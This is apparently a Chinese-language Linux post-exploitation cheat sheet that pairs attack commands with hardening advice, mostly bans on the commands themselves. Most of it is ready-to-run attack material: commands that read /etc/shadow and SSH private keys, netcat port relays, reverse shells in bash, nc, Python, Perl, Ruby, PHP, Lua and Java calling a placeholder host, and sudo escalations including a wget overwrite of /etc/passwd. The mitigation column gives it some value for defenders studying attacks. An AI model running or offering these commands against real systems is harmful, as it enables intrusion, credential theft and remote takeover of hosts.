含义 | 命令 | 修复建议 | ||
信息收集 | 操作系统 | 发行类型 | cat /etc/issue | 禁止cat,uname命令;在业务不需要时,可进一步限制对相关文件/目录的访问权限 |
cat /etc/*-release | ||||
cat /etc/lsb-release | ||||
内核版本 | cat /proc/version | |||
uname -a | ||||
uname -mrs | ||||
环境变量 | cat /etc/profile | |||
cat /etc/bashrc | ||||
cat ~/.bash_profile | ||||
cat ~/.bashrc | ||||
cat ~/.bash_logout | ||||
应用与服务 | root正在运行哪些服务 | ps aux | grep root | 禁止cat,ls,ps命令 | |
ps -ef | grep root | ||||
cat /etc/services | ||||
安装了哪些应用程序?它们是什么版本?它们目前是否在运行? | ls -alh /usr/bin/ | |||
ls -alh /sbin/; dpkg -l; rpm -qa | ||||
ls -alh /var/cache/apt/archives | ||||
ls -alh /var/cache/yum/ | ||||
查看服务配置,是否存在有漏洞的插件 | cat /etc/syslog.conf | |||
cat /etc/chttp.conf | ||||
cat /etc/lighttpd.conf | ||||
cat /etc/cups/cupsd.conf | ||||
cat /etc/inetd.conf | ||||
cat /etc/apache2/apache2.conf | ||||
cat /etc/httpd/conf/httpd.conf | ||||
cat /etc/my.conf | ||||
cat /opt/lampp/etc/httpd.conf | ||||
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' | ||||
是否有明文存储的用户名/密码 | find . -name "*.python" -print0 | xargs -0 grep -i -n "var $password" | |||
通讯与网络 | 系统具有哪些NIC?它是否连接到另一个网络? | /sbin/ifconfig -a | 禁止cat,iptables,ifconfig命令 | |
cat /etc/network/interfaces | ||||
cat /etc/sysconfig/network | ||||
查看网络配置,DNS,网关 | cat /etc/resolv.conf | |||
cat /etc/sysconfig/network | ||||
cat /etc/networks | ||||
iptables -L; hostname; dnsdomainname | ||||
IP和/或MAC地址 | arp -e; route; /sbin/route -nee | |||
机密信息和用户 | id | 禁止cat,id,whoami,who,last,grep,awk,ls命令 | ||
who | ||||
last | ||||
List of users | cat /etc/passwd | cut -d: -f1 | |||
List of super users | grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' | |||
List of super users | awk -F: '($3 == "0") {print}' | |||
cat /etc/sudoers | ||||
sudo -l | ||||
敏感主机密码文件 | cat /etc/passwd | |||
cat /etc/group | ||||
cat /etc/shadow | ||||
ls -alh /var/mail/ | ||||
脚本、数据库、配置文件或日志文件中是否存有密码?密码的默认路径和位置 | cat /var/apache2/config.inc | |||
cat /var/lib/mysql/mysql/user.MYD | ||||
cat /root/anaconda-ks.cfg | ||||
用户信息 | cat ~/.bashrc | |||
cat ~/.profile | ||||
cat /var/mail/root | ||||
cat /var/spool/mail/root | ||||
私钥信息 | cat ~/.ssh/authorized_keys | |||
cat ~/.ssh/identity | ||||
cat ~/.ssh/identity.pub | ||||
cat ~/.ssh/id_rsa.pub | ||||
cat ~/.ssh/id_rsa | ||||
cat ~/.ssh/id_dsa.pub | ||||
cat ~/.ssh/id_dsa | ||||
cat /etc/ssh/ssh_config | ||||
cat /etc/ssh/sshd_config | ||||
cat /etc/ssh/ssh_host_dsa_key.pub | ||||
cat /etc/ssh/ssh_host_dsa_key | ||||
cat /etc/ssh/ssh_host_rsa_key.pub | ||||
cat /etc/ssh/ssh_host_rsa_key | ||||
cat /etc/ssh/ssh_host_key.pub | ||||
cat /etc/ssh/ssh_host_key | ||||
查找漏洞利用代码 | 安装/支持的开发工具/语言 | find / -name perl* | 禁止find命令 | |
find / -name python* | ||||
find / -name gcc* | ||||
find / -name cc | ||||
上传文件的方式 | find / -name wget | |||
find / -name nc* | ||||
find / -name netcat* | ||||
find / -name tftp* | ||||
find / -name ftp | ||||
漏洞利用 | 构造更强命令的交互 | bash | python -c ‘import pty;pty.spawn(“/bin/bash”)’ | 1.禁止连接外网 2.禁止bash,sh命令 |
echo os.system(‘/bin/bash’) | ||||
/bin/sh -i | ||||
端口转发 | FPipe.exe -l 80 -r 80 -s 80 192.168.1.7 | 业务允许条件下,禁止SSH,mknod,nc命令 | ||
ssh | ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port | |||
backpipe | mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe # Port Relay | |||
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080) | ||||
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080) | ||||
反弹Shell的多种方式 | Bash反弹 | bash -i >& /dev/tcp/x.x.x.x/port 0>&1 | 1.禁止连接外网 2.禁止python,perl,ruby,lua,php,bash,telnet,rm,mknod,nc,mkfifo命令 | |
telnet反弹 | telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 5555 | |||
rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p | ||||
nc(netcat)反弹 | nc -e /bin/bash x.x.x.x port | |||
rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x 9999 >/tmp/f | ||||
python脚本反弹 | python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“x.x.x.x”,5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’ | |||
Perl脚本反弹 | perl -e ‘use Socket;$i=”x.x.x.x”;$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’ | |||
perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”x.x.x.x:5555″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ | ||||
Ruby脚本反弹 | ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“x.x.x.x”,”5555″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’ | |||
ruby -rsocket -e’f=TCPSocket.open(“x.x.x.x”,5555).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’ | ||||
php脚本反弹 | php -r ‘$sock=fsockopen(“x.x.x.x”,5555);exec(“/bin/bash -i <&3 >&3 2>&3”);’ | |||
java脚本反弹 | public class Revs { /** * @param args * @throws Exception */ public static void main(String[] args) throws Exception { // TODO Auto-generated method stub Runtime r = Runtime.getRuntime(); String cmd[]= {“/bin/bash”,”-c”,”exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done”}; Process p = r.exec(cmd); p.waitFor(); } } | |||
Lua脚本反弹 | lua -e “require(‘socket’);require(‘os’);t=socket.tcp();t:connect(‘x.x.x.x’,’5555′);os.execute(‘/bin/sh -i <&3 >&3 2>&3’);” | |||
提权 | 滥用SUDO | find | sudo find / etc / passwd -exec / bin / sh \; | 在sudoers中禁止find,vim,nmap,man,less,more,awk,nano,wget,apache等命令 |
Vim | sudo vim -c’!sh’ | |||
Nmap | sudo nmap-交互式nmap>!shsh-4.1# | |||
Man | sudo man man | |||
less | sudo less / etc / hosts | |||
more | sudo more / etc / hosts | |||
awk | sudo awk’BEGIN {system(“ / bin / sh”)}’ | |||
nano | sudo nano / etc / passwd | |||
wget | sudo wget http://192.168.56.1:8080/passwd -O / etc / passwd | |||
apache | sudo apache2 -f / etc / shadow | |||
SUID和SGID配置错误 | 查找SUID文件 | find / -perm -4000 -type f 2>/dev/null | 禁止find,cat,ls,base命令 | |
查找root拥有的SUID文件 | find / -uid 0 -perm -4000 -type f 2>/dev/null | |||
查找SGID文件(粘性位) | find / -perm -2000 -type f 2>/dev/null | |||
查找全局可写(world-writable)文件,不包括proc文件 | find / ! -path "/proc/*" -perm -2 -type f -print 2>/dev/null | |||
查找当前用户可读的密钥或证书(示例中的用户/组名 support 需按实际环境替换) | find / -type f '(' -name '*.cert' -or -name '*.crt' -or -name '*.pem' -or -name '*.ca' -or -name '*.p12' -or -name '*.cer' -or -name '*.der' ')' '(' '(' -user support -perm -u=r ')' -or '(' -group support -perm -g=r ')' -or '(' -perm -o=r ')' ')' 2> /dev/null | |||
查找rhost配置文件 | find /home -name '*.rhosts' -print 2>/dev/null | |||
查找hosts.equiv,列出其权限并输出文件内容 | find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \; | |||
显示当前用户历史记录 | cat ~/.bash_history | |||
显示当前用户的各类历史记录文件 | ls -la ~/.*_history | |||
检查当前用户的ssh文件 | ls -la ~/.ssh/ | |||
列出/etc中的配置文件 | find /etc -maxdepth 1 -name '*.conf' -type f 或 ls -la /etc/*.conf | |||
NFS权限弱 | 查看导出给远程用户的目录/文件系统及其配置与权限 | cat /etc/exports |